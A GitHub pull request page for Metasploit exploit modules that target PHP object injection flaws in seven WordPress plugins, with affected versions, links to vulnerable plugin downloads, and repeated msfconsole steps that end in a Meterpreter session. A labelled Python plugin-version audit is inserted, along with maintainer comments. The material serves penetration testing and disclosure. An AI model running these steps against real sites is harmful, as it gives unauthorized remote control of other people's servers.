Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins #8006

Closed
wants to merge 28 commits into from


@ykoster ykoster commented Feb 24, 2017

These modules exploit multiple unauthenticated PHP object injection vulnerabilities in various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2).

Affected plugins

Google Forms < 0.91
Ecwid Ecommerce Shopping Cart < 4.4.4
CMS Commander Client < 2.22
InfiniteWP Client < 1.6.1.1
Analytics Stats Counter Statistics (not fixed)
YITH WooCommerce Compare < 2.1.0
Google Analytics Counter Tracker < 3.5.1

Verification

Make sure you're running a WordPress site with one of the affected plugins installed & activated.

Google Forms < 0.91

https://sumofpwn.nl/download/wpgform.0.84.zip

  • Start msfconsole
  • use exploit/multi/http/wp_google_forms_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Ecwid Ecommerce Shopping Cart < 4.4.4

Requires (free) registration & activation @ Ecwid

https://sumofpwn.nl/download/ecwid-shopping-cart.4.4.zip

  • Start msfconsole
  • use exploit/multi/http/wp_ecwid_shopping_cart_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

CMS Commander Client < 2.22

https://sumofpwn.nl/download/cms-commander-client.2.21.zip

  • Start msfconsole
  • use exploit/multi/http/wp_cms_commander_client_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

InfiniteWP Client < 1.6.1.1

https://sumofpwn.nl/download/iwp-client.zip

  • Start msfconsole
  • use exploit/multi/http/wp_infinitewp_client_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Analytics Stats Counter Statistics

https://sumofpwn.nl/download/stats-counter.zip

  • Start msfconsole
  • use exploit/multi/http/wp_analytics_stats_counter_statistics_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

YITH WooCommerce Compare < 2.1.0

Requires WooCommerce

https://sumofpwn.nl/download/yith-woocommerce-compare.2.0.9.zip
https://sumofpwn.nl/download/woocommerce.2.6.1.zip

  • Start msfconsole
  • use exploit/multi/http/wp_yith_woocommerce_compare_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started

Google Analytics Counter Tracker < 3.5.1

https://sumofpwn.nl/download/analytics-counter.zip

  • Start msfconsole
  • use exploit/multi/http/wp_google_analytics_counter_tracker_unserialize
  • set RHOST <ip target site>
  • set TARGETURI <WordPress path>
  • set LHOST <ip of FTP service>
  • optionally set RPORT, SSL, and VHOST
  • exploit
  • Verify a new Meterpreter session is started
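
For checking one's own sites against the affected list in this description, a version audit as an added example (not part of the pull request or of Metasploit): it reads the `Version:` header of each plugin's main file and compares it with the fixed releases listed above. The plugin directory names are an assumption taken from the download archive names on this page, and the sample headers are constructed.

```python
import re

# Fixed releases as listed in the PR description; None means "not fixed".
# Directory names are assumed from the download archive names on the page.
AFFECTED = {
    "wpgform": ("Google Forms", "0.91"),
    "ecwid-shopping-cart": ("Ecwid Ecommerce Shopping Cart", "4.4.4"),
    "cms-commander-client": ("CMS Commander Client", "2.22"),
    "iwp-client": ("InfiniteWP Client", "1.6.1.1"),
    "stats-counter": ("Analytics Stats Counter Statistics", None),
    "yith-woocommerce-compare": ("YITH WooCommerce Compare", "2.1.0"),
    "analytics-counter": ("Google Analytics Counter Tracker", "3.5.1"),
}
HEADER_VERSION = re.compile(r"^[ \t/*#@]*Version:[ \t]*(\S+)", re.I | re.M)

def header_version(php_source):
    """Return the Version: value from a WordPress plugin header, or None."""
    match = HEADER_VERSION.search(php_source)
    return match.group(1) if match else None

def version_key(version):
    """'1.6.1.1' -> (1, 6, 1, 1); trailing zeros dropped so 2.1 == 2.1.0."""
    parts = [int(p) for p in re.findall(r"\d+", version)]
    while parts and parts[-1] == 0:
        parts.pop()
    return tuple(parts)

def audit(installed):
    """installed maps plugin directory -> main-file source; returns findings."""
    findings = []
    for slug, source in sorted(installed.items()):
        if slug not in AFFECTED:
            continue
        name, fixed = AFFECTED[slug]
        found = header_version(source)
        if fixed is None:
            findings.append((name, found, "no fixed release listed"))
        elif found is None:
            findings.append((name, None, "version unreadable, check manually"))
        elif version_key(found) < version_key(fixed):
            findings.append((name, found, "update to %s or later" % fixed))
    return findings

# Constructed sample headers, not copied from the real plugins.
SAMPLE = {
    "wpgform": "<?php\n/*\n * Plugin Name: Google Forms\n * Version: 0.84\n */",
    "iwp-client": "<?php\n/*\nPlugin Name: Client\nVersion: 1.6.1.1\n*/",
    "stats-counter": "<?php\n/*\nPlugin Name: Counter\nVersion: 1.2\n*/",
}
```

Calling `audit(SAMPLE)` returns one tuple per installed plugin that is still below its fixed release or has no fixed release listed; plugins at or above the fixed version produce no finding.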

Yorick Koster and others added 8 commits November 8, 2016 16:05
This module exploits multiple PHP object injection vulnerabilities affecting various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2)
Fix formatting warnings
Removed nBill Lite reference, fixed indices
@wchen-r7
Contributor

I think this module needs to be broken down into separate modules.

@ykoster
Contributor Author

ykoster commented Feb 24, 2017

@wchen-r7 split in separate modules :)

@ykoster ykoster changed the title Add exploit module for multiple PHP object injection vulnerabilities affecting various WordPress plugins Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins Feb 25, 2017
@ykoster
Contributor Author

ykoster commented Apr 21, 2017

FYI, the POP chain still works in WordPress 4.7.4, which was released yesterday

@jrobles-r7 jrobles-r7 self-assigned this Nov 16, 2018
@acammack-r7 acammack-r7 added the attic Older submissions that we still want to work on again label Dec 5, 2018
@acammack-r7
Contributor

Hello @ykoster, I'm sorry we have left this sitting for so long. I am closing this PR for now as part of an initiative to have our queue reflect PRs currently being developed, and I have added the attic label so that we won't lose track of it. You can learn more about the new PR label on our wiki. @jrobles-r7 has volunteered to test this and I look forward to when this can be reopened and landed!
